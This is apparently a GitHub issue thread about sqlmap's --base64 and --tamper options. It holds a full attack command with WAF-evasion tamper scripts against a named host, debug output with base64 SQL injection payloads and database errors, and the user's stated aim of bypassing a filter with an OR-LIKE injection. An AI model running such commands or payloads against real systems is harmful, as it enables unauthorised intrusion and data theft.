--base64 bug

[c2xusnpq6]

python3 sqlmap.py -v 2 --delay 0.1 --safe-url "https://sys.test.org.cn/log_in/log.php?base64=aWQ9MSYmcGFzcz0xMjMmJmFjdGlvbj1sb2cmJmVuX3VzPTA" --safe-freq 1 -u "https://sys.test.org.cn/log_in/log.php?base64=aWQ9MQ" --base64 base64 --level 5 --risk 3 --time-sec 15 --retries 5 --unstable --keep-alive --shell --random-agent --tamper between,equaltolike -p base64

sqlmap > --dbs -v 3 --parse-errors

[*] starting

[DEBUG] cleaning up configuration parameters
[INFO] loading tamper module 'between'
[INFO] loading tamper module 'equaltolike'
[DEBUG] setting the HTTP timeout
[DEBUG] setting the HTTP User-Agent header
[DEBUG] loading random HTTP User-Agent header(s) from file '/mnt/c/Users/user/sqlmap/data/txt/user-agents.txt'
[INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 Edg/89.0.774.45' from file '/mnt/c/Users/user/sqlmap/data/txt/user-agents.txt'
[DEBUG] creating HTTP requests opener object
[DEBUG] setting the HTTP Referer header to the target URL
[DEBUG] setting the HTTP Host header to the target URL
[DEBUG] resolving hostname 'sys.test.org.cn'
[INFO] testing connection to the target URL
[DEBUG] declared web page charset 'big5'
you have not declared cookie(s), while server wants to set its own ('citrix_ns_id=hidden;PHPSESSID=7fpt9oktucr...g8le0r9eg0;PHPSESSID=7fpt9oktucr...g8le0r9eg0'). Do you want to use those [Y/n]
[CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[INFO] testing if the target URL content is stable
[WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[PAYLOAD] aWQ9MSguKCwpIicuKS4 LIKE
[WARNING] parsed DBMS error message: ':You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.).
                 \xa1'' at line 1'
[INFO] heuristic (basic) test shows that GET parameter 'base64' might be injectable (possible DBMS: 'MySQL')
[PAYLOAD] aWQ9MSdKb0RlaEg8JyI+cmlJc0pk
[INFO] heuristic (XSS) test shows that GET parameter 'base64' might be vulnerable to cross-site scripting (XSS) attacks
[INFO] testing for SQL injection on GET parameter 'base64'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
[INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[PAYLOAD] aWQ9MQ LIKE  LIKE
[PAYLOAD] aWQ9MSkgQU5EIDY1MzQ9MTMzNy0tIGFNcXc LIKE
[PAYLOAD] aWQ9MSkgQU5EIDk3NDM9OTc0My0tIHRTUVo LIKE
[PAYLOAD] aWQ9MSkgQU5EIDkxMTY9MTgyNy0tIEtudnY LIKE
[PAYLOAD] aWQ9MScpIEFORCA1NDgxPTk4MDEtLSBEVklF
[WARNING] parsed DBMS error message: ':You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') and 5481'' at line 1'
[PAYLOAD] aWQ9MScpIEFORCA5NzQzPTk3NDMtLSBERmJ0
[WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]
[ERROR] user quit

[*] ending

sqlmap >

--tamper bug?

i need equaltolike to bypass the filter...

[stamparm]

1) Base64 encoding should not need any tampering as WAF/IPS in between will not decode arbitrary base64-encoded parameter values 2) Will disable the possibility to use --base64 and --tamper

[c2xusnpq6]

If you base64 encode id=' OR '1' LIKE '1, it will show all the record, so there must be injectable?...

And I'm going to need both --base64 and --tamper between,equaltolike to do that..

[c2xusnpq6]

needed this, pls... ^^'' @stamparm